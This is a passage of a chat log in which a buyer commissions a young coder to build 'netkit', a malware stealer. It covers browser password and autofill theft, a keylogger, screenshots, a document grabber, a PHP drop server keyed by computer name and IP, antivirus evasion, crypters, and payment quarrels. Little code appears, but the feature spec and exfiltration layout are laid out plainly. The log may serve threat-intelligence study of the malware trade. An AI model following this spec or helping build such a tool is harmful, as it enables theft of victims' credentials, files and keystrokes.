  1384. [12/9/2012 12:42:04 AM] ' Tweety HF;: I am the only person working on it
  1385. [12/9/2012 1:00:11 AM] Shelly Bongo: okay
  1386. [12/9/2012 1:01:35 AM] Shelly Bongo: did you get to dropbox/etc?
  1387. [12/9/2012 1:03:51 AM] ' Tweety HF;: what u mean
  1388. [12/9/2012 1:05:22 AM] Shelly Bongo: dropbox stealer
  1389. [12/9/2012 1:34:46 AM] Shelly Bongo: ??
  1390. [12/9/2012 1:35:46 AM] ' Tweety HF;: I'm trying to find the keys
  1391. [12/9/2012 1:35:47 AM] ' Tweety HF;: hold on
  1392. [12/9/2012 1:37:35 AM] Shelly Bongo: okay, i need to leave, please do everything you can to have it all ready by tomorrrow.
  1393. [12/9/2012 1:40:22 AM] ' Tweety HF;: No problem.
  1394. [12/9/2012 1:40:27 AM] ' Tweety HF;: Dropbox stealer is not possible.
  1395. [12/9/2012 1:40:37 AM] ' Tweety HF;: It downloads it from the cloud, it does not save the credentials
  1396. [12/9/2012 9:02:19 AM] Shelly Bongo: any news?
  1397. [12/9/2012 5:47:15 PM] Shelly Bongo: ???
  1398. [12/9/2012 9:10:19 PM] ' Tweety HF;: Finished the file stealer, just need a few more tweaks
  1399. [12/9/2012 9:13:56 PM] Shelly Bongo: okay, ETA for the fully working exe?
  1400. [12/9/2012 9:14:08 PM] Shelly Bongo: s/exe/source/
  1401. [12/9/2012 9:14:28 PM] Shelly Bongo: i must have it until tuesday morning
  1402. [12/9/2012 9:14:35 PM] ' Tweety HF;: Of course no problem.
  1403. [12/9/2012 9:14:48 PM] Shelly Bongo: okay
  1404. [12/9/2012 9:15:05 PM] ' Tweety HF;: When will you be sending the final payment?
  1405. [12/9/2012 9:15:27 PM] Shelly Bongo: we agreed that after i get the source and see it's fully working
  1406. [12/9/2012 9:15:32 PM] Shelly Bongo: but i can do 2 batches
  1407. [12/9/2012 9:15:49 PM] Shelly Bongo: 175$ upon source delivery
  1408. [12/9/2012 9:16:02 PM] Shelly Bongo: and 175$ more after i finish testing
  1409. [12/9/2012 9:16:30 PM] Shelly Bongo: testing means - see that functionality is what we agreed on, see it's fud, see it's stable, etc.
  1410. [12/9/2012 9:17:46 PM] ' Tweety HF;: no problem.
  1411. [12/9/2012 11:12:52 PM] Shelly Bongo: what about the pass recovery - got all of them down aside thunderbird?
  1412. [12/9/2012 11:32:44 PM] Shelly Bongo: ?
  1413. [12/9/2012 11:59:15 PM] Shelly Bongo: listen, i am beginning to be stressed with time, other people are depending on this, i'd like it to be ready tomorrow evening, up to 20 hours from now - please accomodate
  1414. [12/10/2012 12:08:57 AM] ' Tweety HF;: Yeah that's no problem.
  1415. [12/10/2012 12:18:37 AM] Shelly Bongo: [Sunday, December 09, 2012 11:12 PM] Shelly Bongo:
  1416.  
  1417. <<< what about the pass recovery - got all of them down aside thunderbird?
  1418. [12/10/2012 12:20:07 AM] ' Tweety HF;: Yes, apart from the cloud drives.
  1419. [12/10/2012 12:20:16 AM] ' Tweety HF;: It's not possible to get them.
  1420. [12/10/2012 12:20:29 AM] ' Tweety HF;: They are not stored in the local area but on the cloud.
  1421. [12/10/2012 12:31:40 AM] Shelly Bongo: NONE of them?
  1422. [12/10/2012 12:32:18 AM] Shelly Bongo: not even google drive / skydrive?
  1423. [12/10/2012 12:32:28 AM] ' Tweety HF;: It's not possible. It's all stored in the cloud.
  1424. [12/10/2012 12:32:36 AM] ' Tweety HF;: The credentials don't get stored within the computer
  1425. [12/10/2012 12:32:44 AM] Shelly Bongo: outlook?
  1426. [12/10/2012 12:36:51 AM] Shelly Bongo: Browsers - Chrome, Firefox, Internet Explorer 7-8-9, Safari
  1427. IM - Skype, MSN/Live, Google Talk, Yahoo
  1428. Mail - Outlook, Thunderbird
  1429. Cloud Drives - DropBox, Google Drive, SkyDrive
  1430.  
  1431.  
  1432.  
  1433. For the browsers - please include not only user/password information but also "autofill" information, e.g. see Chrome's "Addresses" and "Credit Cards" autofill settings
  1434. [12/10/2012 12:37:04 AM] Shelly Bongo: Cloud Drives is not in, Thunderbird is not in.
  1435. [12/10/2012 12:37:06 AM] Shelly Bongo: all the rest is in?
  1436. [12/10/2012 12:39:52 AM] ' Tweety HF;: Yes all the rest is in
  1437. [12/10/2012 12:40:17 AM] Shelly Bongo: and the browsers get autofill info?
  1438. [12/10/2012 12:40:56 AM] ' Tweety HF;: im looking into it, I never tried stealing auto fill before
  1439. [12/10/2012 12:41:09 AM] Shelly Bongo: what about skype?
  1440. [12/10/2012 12:41:16 AM] Shelly Bongo: does it steal the user/pass?
  1441. [12/10/2012 12:42:51 AM] ' Tweety HF;: skype is impossible
  1442. [12/10/2012 12:43:57 AM] Shelly Bongo: i just asked you if all the rest besides cloud drives / tbird are in, you said yes
  1443. [12/10/2012 12:44:04 AM] Shelly Bongo: please provide accurate answers.
  1444. [12/10/2012 12:44:10 AM] Shelly Bongo: WHAT IS IN AND WHAT IS NOT IN.
  1445. [12/10/2012 12:44:14 AM] Shelly Bongo: i'm starting to lose patience
  1446. [12/10/2012 12:44:16 AM] ' Tweety HF;: I had to check if it's in or not
  1447. [12/10/2012 12:44:40 AM] Shelly Bongo: okay, i have other loggers that steal some file from skype
  1448. [12/10/2012 12:44:48 AM] Shelly Bongo: you sure it's impossible?
  1449. [12/10/2012 12:44:52 AM] ' Tweety HF;: Yes.
  1450. [12/10/2012 12:45:18 AM] Shelly Bongo: so, aside skype/tbird/cloud-drives, all is in, 100%
  1451. [12/10/2012 12:45:20 AM] Shelly Bongo: ?
  1452. [12/10/2012 12:45:28 AM] ' Tweety HF;: Yes.
  1453. [12/10/2012 12:45:42 AM] Shelly Bongo: and you are working on autofill
  1454. [12/10/2012 12:45:46 AM] Shelly Bongo: okay
  1455. [12/10/2012 12:45:53 AM] Shelly Bongo: file stealer is done you said, right?
  1456. [12/10/2012 12:47:14 AM] ' Tweety HF;: Yes
  1457. [12/10/2012 12:47:31 AM] Shelly Bongo: so what's left?
  1458. [12/10/2012 12:47:50 AM] ' Tweety HF;: Need to do the intervals
  1459. [12/10/2012 12:47:53 AM] ' Tweety HF;: and then testing
  1460. [12/10/2012 12:48:10 AM] Shelly Bongo: and the data encryption/submission and php side
  1461. [12/10/2012 12:48:23 AM] ' Tweety HF;: that will take me 15 mins to write up
  1462. [12/10/2012 12:48:30 AM] ' Tweety HF;: i wrote one but it was a bit weird
  1463. [12/10/2012 12:48:33 AM] ' Tweety HF;: so ill redo it
  1464. [12/10/2012 12:48:54 AM] Shelly Bongo: is there any chance you can finish by tomorrow morning?
  1465. [12/10/2012 12:49:07 AM] ' Tweety HF;: Yes.
  1466. [12/10/2012 12:50:48 AM] Shelly Bongo: ok.
  1467. [12/10/2012 12:55:08 AM] ' Tweety HF;: for auto fill, can i just take the whole database?
  1468. [12/10/2012 12:55:16 AM] ' Tweety HF;: the db has 8 tables
  1469. [12/10/2012 12:55:32 AM] ' Tweety HF;: you can browse it in sqlite datbases
  1470. [12/10/2012 12:55:53 AM] Shelly Bongo: you mean the file itself?
  1471. [12/10/2012 12:55:56 AM] ' Tweety HF;: yes
  1472. [12/10/2012 12:56:11 AM] ' Tweety HF;: extracting it will be very difficult because it has more than 8 tables
  1473. [12/10/2012 12:56:12 AM] Shelly Bongo: that's for chrome?
  1474. [12/10/2012 12:56:16 AM] ' Tweety HF;: yeah
  1475. [12/10/2012 12:56:27 AM] ' Tweety HF;: its the same with all browsers though
  1476. [12/10/2012 12:59:13 AM] Shelly Bongo: then yes just attach the dbfile
  1477. [12/10/2012 11:12:01 AM] Shelly Bongo: hi, status?
  1478. [12/10/2012 3:56:04 PM] Shelly Bongo: ???
  1479. [12/10/2012 10:12:38 PM] Shelly Bongo: i'm still waiting for an update, you are late on delivery and not responsive, i am not paying 500$ for somebody who works like a 50$ indi-project from freelancer.com
  1480. [12/10/2012 10:12:48 PM] Shelly Bongo: show up and explain.
  1481. [12/11/2012 1:46:00 AM] ' Tweety HF;: Hi
  1482. [12/11/2012 1:46:44 AM] ' Tweety HF;: I recently died inside, I care little to less about money now. Since my depression is kicking in I guess I can code better. You may use me as your slave. I will carry on finishing the poject..
  1483. [12/11/2012 1:50:18 AM] Shelly Bongo: please, put that emo shit aside and finish the product - if this goes well there will be more, and i'm sure this pays better than other projects you might be involved in
  1484. [12/11/2012 1:50:25 AM] Shelly Bongo: s/product/project.
  1485. [12/11/2012 1:50:56 AM] Shelly Bongo: it's a shame we have to come to this disappointing stage really, try to make the best of it.
  1486. [12/11/2012 1:51:50 AM] ' Tweety HF;: My girlfriend of 2 years just left me recently, I know you don't care but I just need someone to know.
  1487. [12/11/2012 1:51:59 AM] ' Tweety HF;: I am debugging and finalizing the product now..
  1488. [12/11/2012 1:52:32 AM] Shelly Bongo: dude, you're 18.
  1489. [12/11/2012 1:52:43 AM] Shelly Bongo: you'll have other girlfriends and this won't matter, get over it.
  1490. [12/11/2012 1:53:17 AM] ' Tweety HF;: I was never interested in girls, this girl came into my life, we made so many plans, so many things. It was torn away from me. Im used to it.
  1491. [12/11/2012 1:53:52 AM] Shelly Bongo: well i'm sorry to hear that, but i honestly think it won't matter to you in 6 months time when you're doing other things with other people.
  1492. [12/11/2012 1:54:54 AM] Shelly Bongo: now kindly get back to coding.
  1493. [12/11/2012 1:55:08 AM] ' Tweety HF;: Yes sir.
  1494. [12/11/2012 1:55:14 AM] ' Tweety HF;: You don't have to be kind.
  1495. [12/11/2012 1:57:04 AM] Shelly Bongo: i am several dozens of years older than you, kindness gets you far, i won't stop now just because you've been irresponsible - i'm trying to make the most of the situation, as should you.
  1496. [12/11/2012 1:58:34 AM] ' Tweety HF;: Yes sir.
  1497. [12/11/2012 4:11:53 AM] ' Tweety HF;: I don't know how this will sound to you, but can you give me till the end of this week? The anti-virus bypass settings need to be done again, the methods im using with netkit don't seem to be FUD because of how netkit works. I know I am asking for more time, in exchange we can dock $50 off? Let me know.
  1498. [12/11/2012 11:42:03 AM] Shelly Bongo: Hi.
  1499. [12/11/2012 11:43:52 AM] Shelly Bongo: what's the status?
  1500. [12/11/2012 11:47:34 AM] Shelly Bongo: i'd like to see the progress via TV
  1501. [12/12/2012 5:57:45 PM] ' Tweety HF;: Done
  1502. [12/12/2012 5:58:01 PM] ' Tweety HF;: Just reworking the stealers, most of them are outdated so im just fixing them up
  1503. [12/12/2012 5:59:59 PM] Shelly Bongo: i hope you realize, you're not getting $500.
  1504. [12/12/2012 6:00:19 PM] Shelly Bongo: you will have to bring the price down for these delays.
  1505. [12/12/2012 9:50:33 PM] Shelly Bongo: i am really not liking these delays, more so the obvious lies you've been telling me regarding "everything is ready, just touchups left", also making something fud should not take so long.
  1506.  
  1507. listen, i don't want this to go to the wrong direction as i'm sure you don't.  i suggest you tell me the truth of what is and is not ready, and perhaps i will prefer to get the product faster without some of the features i requested (e.g. some of the stealers) - just be honest and tell me what's the status.  what is left, what's giving you a hard time.
  1508. [12/12/2012 9:56:25 PM] ' Tweety HF;: Before you said it was fine for 1-2 day delays, so I thought it should be fine since I have a lot going on. And honestly, I'm not lying at all. The stealer functions are the problems here.
  1509.  
  1510. IE = Old and outdated, only the older versions work but people stopped bothering to make a stealer for it because it is rarely ever used. I'm no good on making SQLite wrappers so I can't really do this and I asked around, nobody has a clue on how to do it either. It's too outdated for it to be updated for the latest versions.
  1511.  
  1512. Google Talk = Stealer has not been made yet, I have been trying to replicate on to the best of my abilities, but again, it's something which is never really in demand. The Chrome Stealer can grab the Gmail used for Google Talk so nobody ever made a stealer. I been working on it for a few days but realized that, again, it uses a cloud storage like Dropbox.
  1513.  
  1514. Yahoo = Again, same with IE. It's too outdated to have a working one.
  1515. [12/12/2012 9:56:56 PM] ' Tweety HF;: Last few days I been working on these stealers trying to come up with a method but I guess it's not something people are interested in anymore.
  1516. [12/12/2012 9:58:50 PM] Shelly Bongo: tell me what IS ready, what can you provide tomorrow?
  1517. [12/12/2012 10:01:16 PM] ' Tweety HF;: Chrome/Firefox/Opera/Sys Info/Process List/MS Product Key/Keylogger/File Stealer
  1518. [12/12/2012 10:02:14 PM] Shelly Bongo: browsers with autofil?
  1519. [12/12/2012 10:02:48 PM] ' Tweety HF;: That won't be possible since you have over 8 tables within the database, so it steals the actual database itself
  1520. [12/12/2012 10:03:06 PM] Shelly Bongo: we agreed on stealing the db itself, why do you say 'that won't be possible'
  1521. [12/12/2012 10:03:08 PM] Shelly Bongo: the db will contain autofill
  1522. [12/12/2012 10:03:13 PM] Shelly Bongo: correct?
  1523. [12/12/2012 10:03:24 PM] ' Tweety HF;: Yes.
  1524. [12/12/2012 10:03:54 PM] Shelly Bongo: is that ready for tomorrow?
  1525. [12/12/2012 10:04:01 PM] ' Tweety HF;: Yes.
  1526. [12/12/2012 10:04:34 PM] Shelly Bongo: file stealer works according to the spec i wrote you?
  1527. [12/12/2012 10:04:57 PM] ' Tweety HF;: Yes
  1528. [12/12/2012 10:05:10 PM] ' Tweety HF;: Doc/Docx/Xls
  1529. [12/12/2012 10:05:31 PM] ' Tweety HF;: Recent/My documents/Desktop
  1530. [12/12/2012 10:05:34 PM] Shelly Bongo: no, i told you that it needs to support pattern lists, and I can choose whatever i want in the source (e.g. *.txt too)
  1531. [12/12/2012 10:05:40 PM] Shelly Bongo: does it support pattern lists?
  1532. [12/12/2012 10:05:43 PM] ' Tweety HF;: Yes
  1533. [12/12/2012 10:05:45 PM] Shelly Bongo: okay
  1534. [12/12/2012 10:05:51 PM] ' Tweety HF;: Dim X As [String]() = {"*.doc", "*docx", "*.xls"}
  1535. [12/12/2012 10:05:56 PM] Shelly Bongo: okay
  1536. [12/12/2012 10:06:18 PM] Shelly Bongo: so suppose we handicap the deliverables list to what is ready "for tomorrow"
  1537. [12/12/2012 10:06:40 PM] Shelly Bongo: is the PHP side ready?
  1538. [12/12/2012 10:06:56 PM] ' Tweety HF;: PHP is written up, just need to confirm something
  1539. [12/12/2012 10:06:59 PM] Shelly Bongo: did you test that all the discussed modules work and deliver content to the php?
  1540. [12/12/2012 10:07:12 PM] ' Tweety HF;: For each infected machine, do you want it to create a new root folder on the server?
  1541. [12/12/2012 10:07:59 PM] Shelly Bongo: regarding the folder, yes, according to PCName + Winkey
  1542. [12/12/2012 10:08:09 PM] ' Tweety HF;: winkey?
  1543. [12/12/2012 10:08:10 PM] Shelly Bongo: or you know what - nevermind
  1544. [12/12/2012 10:08:20 PM] Shelly Bongo: same folder
  1545. [12/12/2012 10:08:23 PM] Shelly Bongo: don't create a new one
  1546. [12/12/2012 10:08:58 PM] ' Tweety HF;: Alright, do you want a password for the zipped folders?
  1547. [12/12/2012 10:09:10 PM] Shelly Bongo: what folders? same folder
  1548. [12/12/2012 10:09:41 PM] Shelly Bongo: e.g. /var/www/archive/logs/
  1549. [12/12/2012 10:10:02 PM] Shelly Bongo: and files should be stored as "[COMPUTERNAME]-[IP]-files/keys/screenshots-[TIMESTAMP]"
  1550. [12/12/2012 10:10:06 PM] Shelly Bongo: btw, screenshots ready too?
  1551. [12/12/2012 10:10:09 PM] ' Tweety HF;: Yes
  1552. [12/12/2012 10:10:17 PM] Shelly Bongo: okay
  1553. [12/12/2012 10:10:52 PM] Shelly Bongo: so for this version of netkit with overly delayed and reduced features, i'm willing to pay no more than 400$.
  1554. [12/12/2012 10:10:59 PM] Shelly Bongo: provided that you deliver TOMORROW.
  1555. [12/12/2012 10:11:04 PM] Shelly Bongo: not 1 day after, but tomorrow
  1556. [12/12/2012 10:11:45 PM] Shelly Bongo: i had things depending on this job of yours and you failed me.
  1557. [12/12/2012 10:12:27 PM] Shelly Bongo: it'll need to be delivered AFTER the php part is done, after you verified all modules work and that AVs don't catch this
  1558. [12/12/2012 10:12:39 PM] Shelly Bongo: tell me if we have ourselves a deal or not.
  1559. [12/12/2012 10:17:33 PM] ' Tweety HF;: Did you not get my message tomorrow? I asked if I can have till the end of this week to get it finished completely and in return you could deduct $50 off the final payment.
  1560. [12/12/2012 10:17:48 PM] ' Tweety HF;: I don't understand why your deducting me and still want it ready by tomorrow.
  1561. [12/12/2012 10:18:05 PM] Shelly Bongo: we agreed on spec X, and delivery date Y (sunday)
  1562. [12/12/2012 10:18:24 PM] Shelly Bongo: you took over half of the stealers and say "it's impossible", so you deducted X
  1563. [12/12/2012 10:18:42 PM] Shelly Bongo: and you are late on Y (delivery date), and want to be late even further.
  1564. [12/12/2012 10:18:55 PM] Shelly Bongo: and you expect price to be the same? are you okay?
  1565. [12/12/2012 10:19:17 PM] ' Tweety HF;: Hence why I asked to give me till the end of the week.
  1566. [12/12/2012 10:19:27 PM] ' Tweety HF;: And as far as I was aware:
  1567. [12/12/2012 10:19:28 PM] ' Tweety HF;: [Sunday, December 09, 2012 12:00 AM] Shelly Bongo:
  1568.  
  1569. <<< if there's a 1-2 day delay on the deadline - it's okay, just let me know what's up.
  1570. [12/12/2012 10:19:36 PM] Shelly Bongo: yes, but 1-2 days are over
  1571. [12/12/2012 10:19:39 PM] Shelly Bongo: and it's still not ready
  1572. [12/12/2012 10:19:48 PM] Shelly Bongo: hence, you missed the date.
  1573. [12/12/2012 10:20:09 PM] Shelly Bongo: it's wednesday now, you were supposed to deliver yesterdays at max (2 day late after sunday)
  1574. [12/12/2012 10:20:26 PM] Shelly Bongo: regardless to that, you deducted the stealers to half.
  1575. [12/12/2012 10:20:39 PM] Shelly Bongo: how will waiting until end of the week help? you steal won't provide these stealers
  1576. [12/12/2012 10:21:04 PM] Shelly Bongo: my requested features list will still not be fulfilled.
  1577. [12/12/2012 10:21:08 PM] ' Tweety HF;: I was researching and attempting to write up modules over the last few days for the stealers.
  1578. [12/12/2012 10:21:25 PM] Shelly Bongo: that's an explanation to WHY you missed the mark, you still missed it.
  1579. [12/12/2012 10:21:26 PM] ' Tweety HF;: = Late delivery
  1580. [12/12/2012 10:21:50 PM | Edited 10:22:09 PM] Shelly Bongo: dude, you're a service provider, i don't care about WHY things are delayed, you need to do w/e you can to deliver on time, it's your responsibility.
  1581. [12/12/2012 10:23:37 PM] ' Tweety HF;: Your asking for difficult work, you said it will be fine for 1-2 days delay. I asked before if I can have till the end of the week with a $50 deduction as well.
  1582. [12/12/2012 10:24:28 PM] Shelly Bongo: listen, there's really to argue about.  if you deliver less features, or deliver later than what we agreed on (tuesday, yesteday was the final delivery date agreen on) - price will be deducted.
  1583. [12/12/2012 10:24:47 PM] ' Tweety HF;: Google Talk is stored in the cloud, its not possible but you have the keylogger. Yahoo and IE is possible but the table rows have changed and since they are outdated applications not many people will ever work on them. I am willing to work on them though ahd currently writing up a method.
  1584. [12/12/2012 10:26:51 PM] ' Tweety HF;: Also, would you want a downloader module? I think it will be wise to include that in as well.
  1585. [12/12/2012 10:30:05 PM] Shelly Bongo: i need you to deliver something working ASAP.  i need it yesteday, but since that's not possible, i need it tomorrow.
  1586. [12/12/2012 10:30:12 PM] Shelly Bongo: no need for downloader modules.
  1587. [12/12/2012 10:31:00 PM] ' Tweety HF;: Alright
  1588. [12/12/2012 10:31:04 PM] Shelly Bongo: deliver what you have tomorrow, working, and i'll pay 400 - after that's delivered - you can work on *completing* the missing stealers, and i'll pay you an extra 50.
  1589. [12/12/2012 10:31:25 PM] Shelly Bongo: ofcourse the paid $150 will be deducted from the 400.
  1590. [12/12/2012 10:31:40 PM] ' Tweety HF;: No problem.
  1591. [12/12/2012 10:32:44 PM] Shelly Bongo: do not disappoint me again, i will not tolerate this shit much longer.
  1592. [12/12/2012 10:33:27 PM] Shelly Bongo: i'm really surprised, you gave such a good impression from the get go
  1593. [12/12/2012 10:34:04 PM] ' Tweety HF;: Not much I can do when I try to recreate outdated work for a couple of days.
  1594. [12/12/2012 10:34:31 PM] ' Tweety HF;: Do you want the filestealer to steal the target of each shortcut?
  1595. [12/12/2012 10:34:47 PM] Shelly Bongo: no, work according to spec
  1596. [12/12/2012 10:53:09 PM] Shelly Bongo: what time tomorrow shall i expect it?
  1597. [12/12/2012 10:53:31 PM] Shelly Bongo: can you also deliver it in c# tomorrow, or only afterwards (as part of the 50$ package)
  1598. [12/12/2012 10:59:52 PM] ' Tweety HF;: C# conversion takes a while since I need to manage hosting process as well as unsafe code
  1599. [12/12/2012 11:00:01 PM] ' Tweety HF;: And sometime around the evening.
  1600. [12/12/2012 11:02:11 PM] ' Tweety HF;: going out for dinner now, will be on in a few hours
  1601. [12/12/2012 11:02:12 PM] ' Tweety HF;: bye
  1602. [12/12/2012 11:02:20 PM] Shelly Bongo: i will wait for the files tomorrow eve UK time.
  1603. [12/13/2012 5:23:36 PM] Shelly Bongo: news?
  1604. [12/13/2012 5:24:10 PM] ' Tweety HF;: Im in college
  1605. [12/13/2012 5:24:15 PM] ' Tweety HF;: Il contact you when im home
  1606. [12/13/2012 5:24:32 PM] Shelly Bongo: oh, it's not evening yet in your TZ, okay.
  1607. [12/14/2012 2:14:42 AM] Shelly Bongo: hi
  1608. [12/14/2012 2:15:05 AM] Shelly Bongo: all ready?
  1609. [12/14/2012 7:35:44 PM] Shelly Bongo: ????
  1610. [12/14/2012 7:36:22 PM] ' Tweety HF;: Yeah it's ready.
  1611. [12/14/2012 7:36:35 PM] Shelly Bongo: okay, please send
  1612. [12/14/2012 7:36:40 PM] ' Tweety HF;: Hold on
  1613. [12/14/2012 7:36:44 PM] ' Tweety HF;: have you got a server?
  1614. [12/14/2012 7:36:55 PM] Shelly Bongo: yes
  1615. [12/14/2012 7:37:11 PM] ' Tweety HF;: Ok
  1616. [12/14/2012 7:37:40 PM] ' Tweety HF;: So screenshot + Keylogger + Sysinfo + Files all have different intervals?
  1617. [12/14/2012 7:38:50 PM] Shelly Bongo: yes
  1618. [12/14/2012 7:39:22 PM] ' Tweety HF;: Alright one moment
  1619. [12/14/2012 7:42:15 PM] Shelly Bongo: i have to go
  1620. [12/14/2012 7:42:22 PM] Shelly Bongo: you are late, again
  1621. [12/14/2012 7:42:29 PM] Shelly Bongo: i will return online in 24 hours
  1622. [12/14/2012 7:42:33 PM] Shelly Bongo: have it ready or we cancel this
  1623. [12/14/2012 7:42:37 PM] ' Tweety HF;: Alright.
  1624. [12/14/2012 7:42:57 PM] Shelly Bongo: and you'll either return my money or i'll ensure your unfair conduct is known
  1625. [12/14/2012 7:43:06 PM] ' Tweety HF;: Mhm.
  1626. [12/14/2012 7:43:26 PM] Shelly Bongo: please don't fuck with me, have it ready.
  1627. [12/14/2012 7:43:27 PM] Shelly Bongo: goodbye.
  1628. [12/14/2012 7:44:04 PM] ' Tweety HF;: Bye
  1629. [12/15/2012 12:09:35 PM] Shelly Bongo: hi, how's the progress?
  1630. [12/15/2012 8:30:44 PM] Shelly Bongo: ?
  1631. [12/16/2012 5:49:52 PM | Edited 5:50:04 PM] Shelly Bongo: seriously? you want me to complain about you publically all over your precious forums? and Meph too who vouched for you? not only do you not deliver but you also disappear??
  1632. [12/16/2012 6:36:50 PM] ' Tweety HF;: I'm online.
  1633. [12/16/2012 6:43:13 PM] ' Tweety HF;: http://elementscanner.net//image.php?ID=0762c3c7f5a2f3331576cabc399ed2d6
  1634. [12/16/2012 6:43:25 PM] ' Tweety HF;: Will you be using a crypter or do I need to FUD it for you?
  1635. [12/16/2012 7:49:37 PM] Shelly Bongo: i'll be using a crypter
  1636. [12/16/2012 7:50:09 PM] Shelly Bongo: what is taking you so much time?
  1637. [12/16/2012 7:53:43 PM] ' Tweety HF;: I been done for a while, the day before I waited till evening but you didn't show up so I needed to go.
  1638. [12/16/2012 7:53:48 PM] ' Tweety HF;: I wait till evening yesterday too
  1639. [12/16/2012 7:54:12 PM] Shelly Bongo: that's BS - i was here for over 24 hours now
  1640. [12/16/2012 7:54:16 PM] Shelly Bongo: you weren't around
  1641. [12/16/2012 7:54:19 PM] Shelly Bongo: i sent you several messages
  1642. [12/16/2012 7:54:31 PM] Shelly Bongo: anyway
  1643. [12/16/2012 7:54:51 PM] Shelly Bongo: what's the status, is everything we agreed on ready?
  1644. [12/16/2012 7:54:54 PM] ' Tweety HF;: Yes
  1645. [12/16/2012 7:54:54 PM] ' Tweety HF;: Give me your host name
  1646. [12/16/2012 7:55:05 PM] Shelly Bongo: i won't be doing that
  1647. [12/16/2012 7:55:10 PM] Shelly Bongo: we agreed on what next
  1648. [12/16/2012 7:55:12 PM] Shelly Bongo: you supply source
  1649. [12/16/2012 7:55:15 PM] Shelly Bongo: i transfer BTC
  1650. [12/16/2012 7:55:22 PM] Shelly Bongo: once i test the source and see it's up to spec
  1651. [12/16/2012 7:55:37 PM] ' Tweety HF;: We can test it over teamviewer that's no problem
  1652. [12/16/2012 7:56:23 PM] Shelly Bongo: listen, with your disappearance and delivery fuckups - there's no way in hell that i'm paying you before receiving the source.
  1653. [12/16/2012 7:56:40 PM] Shelly Bongo: i gave you $150 usd advance payment, that's more than enough to show you i'm serious about this.
  1654. [12/16/2012 7:56:51 PM] Shelly Bongo: it's been your turn ever since
  1655. [12/16/2012 7:56:57 PM] Shelly Bongo: and i'm still waiting for you to deliver.
  1656. [12/16/2012 7:57:08 PM] ' Tweety HF;: Theirs more of a chance for you to run away because of the delivery delays.
  1657. [12/16/2012 7:57:18 PM] ' Tweety HF;: If you understand what I mean
  1658. [12/16/2012 7:57:27 PM] Shelly Bongo: decide how you want to proceed
  1659. [12/16/2012 7:58:03 PM] Shelly Bongo: either you pay me back 150$ and keep netkit to yourself
  1660. [12/16/2012 7:58:42 PM] Shelly Bongo: or send it over and get the rest of the money (i'm willing to pay $350, meaning $200 more - no more, because of your delays)
  1661. [12/16/2012 8:00:49 PM] ' Tweety HF;: Theirs more chance of you running away without paying me due to the delays over the chance of me not handing it over.
  1662. [12/16/2012 8:00:58 PM] ' Tweety HF;: I can send you a bin of it? That works.
  1663. [12/16/2012 8:01:07 PM] ' Tweety HF;: Everybodys happyt.
  1664. [12/16/2012 8:01:12 PM] Shelly Bongo: i don't play statistics, we had an agreement, so far i kept my end of the bargain, waiting for your next move.
  1665. [12/16/2012 8:01:28 PM] ' Tweety HF;: Yeah sure, I'll send you a bin for you to test it.
  1666. [12/16/2012 8:01:31 PM] Shelly Bongo: i honestly don't trust that you'll send me a source
  1667. [12/16/2012 8:01:37 PM] Shelly Bongo: so that's not an option
  1668. [12/16/2012 8:02:29 PM] ' Tweety HF;: Dude, I don't need the source. What am I going to do with it?
  1669. [12/16/2012 8:02:31 PM] ' Tweety HF;: It's no use to me
  1670. [12/16/2012 8:05:47 PM] Shelly Bongo: you can sell it like your friend meph
  1671. [12/16/2012 8:06:02 PM] ' Tweety HF;: I don't need to sell it.
  1672. [12/16/2012 8:06:23 PM] ' Tweety HF;: Netkit is only worth to the person that is wanting me to code it
  1673. [12/16/2012 8:07:36 PM] Shelly Bongo: i don't buy that - we had an agreement, i intend to keep my end in it, if you don't intend to keep yours, we're done.
  1674. [12/16/2012 8:08:03 PM] Shelly Bongo: and by 'done' i mean you immediately return my $150 or i post every detail about our communication in the frauders section on HF.
  1675. [12/16/2012 8:09:08 PM] ' Tweety HF;: I don't understand why I can't send you the bin? That makes no sense. You want to test it out so the bin is required, not the source. By asking for the source before payment is something of that a scammer usually says.
  1676. [12/16/2012 8:09:32 PM] Shelly Bongo: do scammers usually pay $150 up front? no
  1677. [12/16/2012 8:10:28 PM] Shelly Bongo: i won't run any bin files, i don't know what's in it - i will review the source code, see it's clean, compile it, run it in VM, test that it works
  1678. [12/16/2012 8:10:33 PM] ' Tweety HF;: Using phsycological engineering, you may have paid up front, take the source and not pay the rest meaning you pay a quarter of the price only. It's a smart move lol.
  1679. [12/16/2012 8:10:45 PM] Shelly Bongo: if it does - and keyboard, screenshots, files and sysinfo work - i pay you the remaining $200
  1680. [12/16/2012 8:10:56 PM] Shelly Bongo: it it doesn't, i'll report the bugs and ask you to fix them
  1681. [12/16/2012 8:10:59 PM] Shelly Bongo: before payment
  1682. [12/16/2012 8:11:17 PM] Shelly Bongo: that's been our agreement from day 1, and it's not going to change just because you suddenly got afraid.
  1683. [12/16/2012 8:11:28 PM] ' Tweety HF;: I don't understand what's wrong with watching me test it out over TV?
  1684. [12/16/2012 8:11:47 PM] Shelly Bongo: hmm, you know what
  1685. [12/16/2012 8:11:49 PM] Shelly Bongo: we can do that
  1686. [12/16/2012 8:11:53 PM] ' Tweety HF;: Alright.
  1687. [12/16/2012 8:12:04 PM] ' Tweety HF;: I need to make a quick host, hold on.
  1688. [12/16/2012 8:12:09 PM] Shelly Bongo: but it'll be a VM with Win7, ok?
  1689. [12/16/2012 8:12:12 PM] ' Tweety HF;: Yeah
  1690. [12/16/2012 8:12:22 PM] ' Tweety HF;: It's a modded version of Win7
  1691. [12/16/2012 8:13:08 PM] Shelly Bongo: modded how?
  1692. [12/16/2012 8:13:27 PM] ' Tweety HF;: Theme
  1693. [12/16/2012 8:14:07 PM] Shelly Bongo: that's fine
  1694. [12/16/2012 8:14:17 PM] Shelly Bongo: please uninstall .net from it
  1695. [12/16/2012 8:14:27 PM] Shelly Bongo: so it'll be as if it's a fresh installed win7
  1696. [12/16/2012 8:14:54 PM] ' Tweety HF;: It's fresh I installed it yesterday
  1697. [12/16/2012 8:15:04 PM] Shelly Bongo: okay
  1698. [12/16/2012 8:15:06 PM] Shelly Bongo: but i want to check
  1699. [12/16/2012 8:15:10 PM] Shelly Bongo: in add/remove programs
  1700. [12/16/2012 8:15:15 PM] Shelly Bongo: that no .net 4 is installed
  1701. [12/16/2012 8:15:16 PM] Shelly Bongo: ok?
  1702. [12/16/2012 8:15:20 PM] ' Tweety HF;: yeah sure
  1703. [12/16/2012 8:18:42 PM] Shelly Bongo: how do i know that you won't spread it the day after i pay you?
  1704. [12/16/2012 8:18:47 PM] Shelly Bongo: e.g. and all AVs will detect it
  1705. [12/16/2012 8:18:53 PM] Shelly Bongo: OR... if you start selling it on HF..
